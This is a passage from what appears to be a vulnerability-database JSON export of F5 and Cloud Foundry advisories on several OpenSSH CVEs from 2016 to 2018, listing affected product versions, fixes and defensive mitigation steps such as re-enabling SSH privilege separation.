resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n", "edition": 1, "modified": "2019-11-11T23:59:00", "published": "2018-04-12T01:06:00", "id": "F5:K32485746", "href": "https://support.f5.com/csp/article/K32485746", "title": "OpenSSH vulnerability CVE-2016-10708", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": 
"2020-04-06T22:40:54", "bulletinFamily": "software", "cvelist": ["CVE-2016-10011"], "description": "\nF5 Product Development has assigned ID 637622 and 689463 (BIG-IP), ID 637622 (BIG-IQ, iWorkflow, and Enterprise Manager), and ID INSTALLER-2868 (Traffix SDC) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H640816 on the **Diagnostics** > **Identified** > **Low** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 \n11.2.1 | 14.1.0 | Low | OpenSSH \nBIG-IP AAM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 \n | 14.1.0 | Low | OpenSSH \nBIG-IP AFM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 | 14.1.0 | Low | OpenSSH \nBIG-IP Analytics | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 \n11.2.1 | 14.1.0 | Low | OpenSSH \nBIG-IP APM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 \n11.2.1 | 14.1.0 | Low | OpenSSH \nBIG-IP ASM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 \n11.2.1 | 14.1.0 | Low | OpenSSH \nBIG-IP DNS | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 | 14.1.0 | Low | OpenSSH \nBIG-IP Edge Gateway | 11.2.1 | None | Low | OpenSSH \nBIG-IP GTM | 11.4.0 - 11.6.3 \n11.2.1 | None | Low | OpenSSH \nBIG-IP Link Controller | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 \n11.2.1 | 14.1.0 | Low | OpenSSH \nBIG-IP PEM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 | 14.1.0 | Low | OpenSSH \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Low | OpenSSH \nBIG-IP WebAccelerator | 11.2.1 | None 
| Low | OpenSSH \nBIG-IP WebSafe | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n | 14.1.0 | Low \n\n \n\n| OpenSSH \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable1 | None \nEnterprise Manager | 3.1.1 | None | Low | OpenSSH \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | OpenSSH \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | OpenSSH \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | OpenSSH \nBIG-IQ ADC | 4.5.0 | None | Low | OpenSSH \nBIG-IQ Centralized Management | 5.0.0 - 5.4.0 \n4.6.0 | None | Low | OpenSSH \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | OpenSSH \nF5 iWorkflow | 2.0.0 - 2.3.0 | None | Low | OpenSSH \nLineRate | None | 3.0.0 - 3.1.1 | Not vulnerable1 | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | OpenSSH \n \n1 The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. 
For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n", "edition": 1, "modified": "2018-12-17T21:30:00", "published": "2017-01-27T03:28:00", "id": "F5:K24324390", "href": "https://support.f5.com/csp/article/K24324390", "title": "OpenSSH vulnerability CVE-2016-10011", "type": "f5", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-06T22:40:20", "bulletinFamily": "software", "cvelist": ["CVE-2016-10010"], "description": "\nF5 Product Development has assigned ID 636460 (BIG-IP, iWorkflow, BIG-IQ, Enterprise Manager), and ID INSTALLER-2868 (Traffix SDC) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) lists Heuristic H64292204 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table. 
For more information about security advisory versioning, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 \nscore1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, \nASM, DNS, GTM, Link Controller, PEM, \nPSM, WebAccelerator, WebSafe) | 15.x | None | Not applicable | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \n14.x | 14.0.0 - 14.0.1 | 14.1.0 - 14.1.2 \n13.x | 13.1.0 - 13.1.3 | None \n12.x | None | Not applicable \n11.x | None | Not applicable \nARX | 6.x | None | 6.2.0 - 6.4.0 | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nBIG-IQ Cloud | 4.x | 4.0.0 - 4.5.0 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nBIG-IQ Device | 4.x | 4.2.0 - 4.5.0 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nBIG-IQ Security | 4.x | 4.0.0 - 4.5.0 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nBIG-IQ ADC | 4.x | 4.5.0 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nBIG-IQ Centralized Management | 7.x | None | Not applicable | Not vulnerable | None | None \n6.x | None | Not applicable \n5.x | None | Not applicable \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nF5 iWorkflow | 2.x | 2.0.0 - 2.0.2 | None | High | 
[7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \nLineRate | 2.x | None | 2.5.0 - 2.6.1 | Not vulnerable | None | None \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | High | [7.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>) | OpenSSH \n4.x | 4.0.0 - 4.4.0 | None \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability for BIG-IP products, F5 recommends that you re-enable privilege separation, if you have disabled it. To do so, perform the following procedure:\n\n**Impact of action:** Improper modifications to the SSH configuration can prevent SSH login. You should perform changes from the serial console.\n\n 1. Log in to the TMOS Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. 
To determine if you have privilege separation disabled, type the following command: \n\nlist /sys sshd\n\nIf you observe the following command output, then privilege separation is disabled, and you should proceed to step 3.\n\nsys sshd { \n include \"UsePrivilegeSeparation no\" \n}\n\nIf there is no command output, or you do not see the **UsePrivilegeSeparation no** include statement in the output, then privilege separation is enabled, and you do not need to proceed.\n\n**Note**: For more information regarding the **UsePrivilegeSeparation** option, refer to the manual page for **sshd_config**, by typing the following command from the Advanced Shell (**bash**) prompt (not **tmsh**):\n\nman sshd_config\n\n 3. To re-enable privilege separation, remove the custom include statement by typing the following command: \n\nedit /sys sshd\n\nIf there are multiple include statements, locate the **UsePrivilegeSeparation no** line, and remove just that statement.\n\nIf **UsePrivilegeSeparation no** is the only include statement, replace that statement with the word **none**.\n\nFor example:\n\nmodify sshd { \n include none \n}\n\n 4. Save your changes for the **sshd** configuration, and exit the **vi** editor.\n 5. To save the configuration, type the following command: \n\nsave /sys config\n\n 6. To exit **tmsh**, type **q** and press **Enter**. 
\n\n**Note**: You do not need to restart the **sshd** service; the new changes are active once you save the configuration.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2020-02-19T05:34:00", "published": "2017-01-24T06:03:00", "id": "F5:K64292204", "href": "https://support.f5.com/csp/article/K64292204", "title": "OpenSSH vulnerability CVE-2016-10010", "type": "f5", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-06T22:39:52", "bulletinFamily": "software", "cvelist": ["CVE-2016-10012"], "description": "\nF5 Product Development has assigned ID 637629 (BIG-IP, BIG-IQ, Enterprise Manager, and F5 iWorkflow) and INSTALLER-2868 (Traffix SDC) to this vulnerability. 
Additionally, [F5 iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H62201745 on the **Diagnostics** > **Identified** > **Low** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP AAM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP AFM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP Analytics | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP APM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP ASM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP DNS | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP Edge Gateway | 11.2.1 | None | Low | OpenSSH \nBIG-IP GTM | 11.4.0 - 11.6.5 \n11.2.1 | None | Low | OpenSSH \nBIG-IP Link Controller | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP PEM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low | OpenSSH \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Low | OpenSSH 
\nBIG-IP WebAccelerator | 11.2.1 | None | Low | OpenSSH \nBIG-IP WebSafe | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.5 \n11.6.0 - 11.6.5 | 15.0.0 - 15.0.1 \n14.1.0 - 14.1.2 | Low \n\n \n\n| OpenSSH \nEnterprise Manager | 3.1.1 | None | Low | OpenSSH \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | OpenSSH \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | OpenSSH \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | OpenSSH \nBIG-IQ ADC | 4.5.0 | None | Low | OpenSSH \nBIG-IQ Centralized Management | 5.0.0 - 6.0.1.1 \n4.6.0 | None | Low | OpenSSH \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | OpenSSH \nF5 iWorkflow | 2.0.0 - 2.0.2 | None | Low | OpenSSH \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable1 | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | OpenSSH \n \n1The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability for affected F5 products, you should permit management access over a secure network and limit secure shell (SSH) access to only trusted users. 
For more information about securing access to BIG-IP systems, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 15.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2019-11-11T22:26:00", "published": "2017-01-27T21:30:00", "id": "F5:K62201745", "href": "https://support.f5.com/csp/article/K62201745", "title": "OpenSSH vulnerability CVE-2016-10012", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-06T22:39:32", "bulletinFamily": "software", "cvelist": ["CVE-2016-10009"], "description": "\nF5 Product Development has assigned ID 636453 (BIG-IP, iWorkflow, BIG-IQ, and Enterprise Manager), and INSTALLER-2868 (Traffix SDC) to this vulnerability. 
Additionally, [F5 iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H31440025 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 \n11.2.1 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP AAM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP AFM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP Analytics | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 \n11.2.1 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP APM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 \n11.2.1 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP ASM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 \n11.2.1 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP DNS | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP Edge Gateway | 11.2.1 | None | Medium | OpenSSH, ssh-agent \nBIG-IP GTM | 11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 \n11.2.1 | None | Medium | OpenSSH, ssh-agent \nBIG-IP Link Controller | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 \n11.2.1 | 14.1.0 \n13.1.3.2 | 
Medium | OpenSSH, ssh-agent \nBIG-IP PEM | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Medium | OpenSSH, ssh-agent \nBIG-IP WebAccelerator | 11.2.1 | None | Medium | OpenSSH, ssh-agent \nBIG-IP WebSafe | 14.0.0 - 14.0.1 \n13.0.0 - 13.1.3 \n12.0.0 - 12.1.51 \n11.6.0 - 11.6.51 \n11.4.0 - 11.5.10 | 14.1.0 \n13.1.3.2 | Medium | OpenSSH, ssh-agent \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | OpenSSH, ssh-agent \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | OpenSSH, ssh-agent \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | OpenSSH, ssh-agent \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | OpenSSH, ssh-agent \nBIG-IQ ADC | 4.5.0 | None | Medium | OpenSSH, ssh-agent \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | None | Medium | OpenSSH, ssh-agent \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | OpenSSH, ssh-agent \nF5 iWorkflow | 2.0.0 - 2.0.2 | None | Medium | OpenSSH, ssh-agent \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | None | Low | OpenSSH, ssh-agent \n \n1F5 will not be developing a fix for the 11.6.x and 12.x.x software branches, and this table will not be updated with subsequent vulnerable releases in these branches. For more information, refer to [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nF5 advises that you do not use the **ssh-agent** program on F5 products.\n\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2020-01-24T22:41:00", "published": "2017-01-24T05:30:00", "id": "F5:K31440025", "href": "https://support.f5.com/csp/article/K31440025", "title": "OpenSSH vulnerability CVE-2016-10009", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "software", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2017-15906", "CVE-2016-10012"], "description": "# \n\n# Severity\n\nLow\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nJann Horn discovered that OpenSSH incorrectly loaded PKCS#11 modules from untrusted directories. A remote attacker could possibly use this issue to execute arbitrary PKCS#11 modules. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. ([CVE-2016-10009](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10009>))\n\nJann Horn discovered that OpenSSH incorrectly handled permissions on Unix-domain sockets when privilege separation is disabled. A local attacker could possibly use this issue to gain privileges. This issue only affected Ubuntu 16.04 LTS. 
([CVE-2016-10010](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10010>))\n\nJann Horn discovered that OpenSSH incorrectly handled certain buffer memory operations. A local attacker could possibly use this issue to obtain sensitive information. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. ([CVE-2016-10011](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10011>))\n\nGuido Vranken discovered that OpenSSH incorrectly handled certain shared memory manager operations. A local attacker could possibly use this issue to gain privileges. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. ([CVE-2016-10012](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10012>))\n\nMichal Zalewski discovered that OpenSSH incorrectly prevented write operations in readonly mode. A remote attacker could possibly use this issue to create zero-length files, leading to a denial of service. ([CVE-2017-15906](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-15906>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is low unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3312.x versions prior to 3312.51\n * 3363.x versions prior to 3363.48\n * 3421.x versions prior to 3421.38\n * 3445.x versions prior to 3445.24\n * 3468.x versions prior to 3468.20\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3312.x versions to 3312.51\n * Upgrade 3363.x versions to 3363.48\n * Upgrade 3421.x versions to 3421.38\n * Upgrade 3445.x versions to 3445.24\n * Upgrade 3468.x versions to 3468.20\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * 
[USN-3538-1](<http://www.ubuntu.com/usn/usn-3538-1/>)\n * [CVE-2016-10009](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10009>)\n * [CVE-2016-10010](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10010>)\n * [CVE-2016-10011](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10011>)\n * [CVE-2016-10012](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-10012>)\n * [CVE-2017-15906](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-15906>)\n", "edition": 5, "modified": "2018-02-01T00:00:00", "published": "2018-02-01T00:00:00", "id": "CFOUNDRY:9760638505AB3E758B4030C32D579480", "href": "https://www.cloudfoundry.org/blog/usn-3538-1/", "title": "USN-3538-1: OpenSSH vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:54", "bulletinFamily": "software", "cvelist": ["CVE-2018-15473", "CVE-2016-10708"], "description": "# \n\n# Severity\n\nLow\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n * Canonical Ubuntu 16.04\n * Canonical Ubuntu 18.04\n\n# Description\n\nRobert Swiecki discovered that OpenSSH incorrectly handled certain messages. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-10708)\n\nIt was discovered that OpenSSH incorrectly handled certain requests. An attacker could possibly use this issue to access sensitive information. 
(CVE-2018-15473)\n\nCVEs contained in this USN include: CVE-2016-10708, CVE-2018-15473\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is low unless otherwise noted._\n\n * Cloud Foundry BOSH trusty-stemcells are vulnerable, including: \n * 3586.x versions prior to 3586.56\n * 3541.x versions prior to 3541.60\n * 3468.x versions prior to 3468.86\n * 3445.x versions prior to 3445.82\n * 3421.x versions prior to 3421.99\n * All other stemcells not listed.\n * Cloud Foundry BOSH xenial-stemcells are vulnerable, including: \n * 170.x versions prior to 170.6\n * 97.x versions prior to 97.33\n * All other stemcells not listed.\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.247.0\n * All versions of Cloud Foundry cflinuxfs3 prior to 0.36.0\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH trusty-stemcells: \n * Upgrade 3586.x versions to 3586.56\n * Upgrade 3541.x versions 